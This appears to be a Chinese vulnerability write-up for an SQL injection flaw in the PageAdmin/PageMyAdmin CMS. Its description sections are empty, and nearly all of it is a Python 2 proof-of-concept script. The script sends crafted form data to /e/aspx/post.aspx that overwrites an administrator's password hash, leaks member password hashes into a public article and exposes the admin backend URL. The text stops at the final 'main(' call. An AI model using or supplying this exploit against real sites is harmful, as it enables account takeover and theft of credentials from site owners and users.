PageMyAdmin sql注入漏洞

一、漏洞简介

二、漏洞影响

三、复现过程

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-


import urllib2
import urllib
import re
import sys

def main():
    url=sys.argv[1]+"/e/aspx/post.aspx"
    fun=sys.argv[2]
    if fun=='upass':
        update(url)
    elif fun=='sqlinject':
        sqlinject(url)
    elif fun=='Backstage':
        Backstage(url)
    else:
        print'''
        usage: pageadminsql.py http://www.baidu.com/ upass
        parameter: uppass sqlinject Backstage
        '''
def update(url):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
    "siteid":"1",
    "formtable":"1",
    "thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        if response.getcode()==200:
            print u">>>>>>修改密码成功 修改密码:admin_1234213<<<<<<"
            pass
    except Exception as e:
        print u">>>>>>修改密码失败<<<<<<"
        pass
def sqlinject(url):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
    "siteid":"1",
    "formtable":"1",
    "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        if response.getcode()==200:
            print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
            pass
    except Exception as e:
        print u">>>>>>密码注入失败<<<<<<"
        pass
def Backstage(url):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
    "siteid":"1",
    "formtable":"1",
    "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        if response.getcode()==200:
            print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
            pass
    except Exception as e:
        print u">>>>>>后台地址注入失败<<<<<<"
        pass
if __name__ == '__main__':
    main(